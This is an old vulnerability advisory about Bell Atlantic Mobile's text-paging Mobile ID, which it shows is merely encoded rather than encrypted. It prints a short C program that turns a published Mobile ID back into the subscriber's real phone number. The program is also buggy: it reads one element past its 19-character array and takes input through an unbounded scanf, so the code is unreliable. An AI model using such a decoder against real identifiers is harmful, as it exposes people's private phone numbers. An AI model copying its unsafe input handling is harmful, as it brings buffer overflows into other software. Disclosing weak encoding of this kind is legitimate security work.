Vulnerability

    Bell Atlantic Cellular Phone encryption

Affected

    Bell Atlantic Cellular Phone (Mobile)

Description

    Kevin Seales found following while experimenting with text  paging
    on cellular  phone from  Bell Atlantic.   It is  said following on
    their web site:

        Bell  Atlantic  Mobile  has  encrypted  your phone number as a
        courtesy, however the  protocol for encryption  is proprietary
        and we cannot guarantee its security. Bell Atlantic Mobile  is
        not responsible for the number or content of messages lost  or
        misdirected  due  to  interruptions  or  fluctuations  in  the
        Internet.

    Kevin found that its not even encrypted, its simply encoded.   Its
    fairly simple and straight forward  so no details, but below  is a
    decoding program.

    #include <stdio.h>

    int main(void)
    {
      char mobile_id[19];

      printf("This program takes the Mobile ID Bell Atlantic gives you to\n");
      printf("put on your web page and decodes it to give you the real phone\n");
      printf("number.\nCoded by Kevin Seales, kevin@drunks.com\n\n");
      printf("Enter Mobile ID Number:  ");
      scanf("%s", &mobile_id);

      printf("The Real Mobile ID Number is: ");
      printf("%c%c%c", mobile_id[19],mobile_id[18],mobile_id[17]);
      printf("-");
      printf("%c%c%c", mobile_id[3],mobile_id[12],mobile_id[14]);
      printf("-");
      printf("%c%c%c%c\n", mobile_id[6],mobile_id[16],mobile_id[8],mobile_id[9]);

    }

Solution

   I don't know, but BA should at least start using encryption.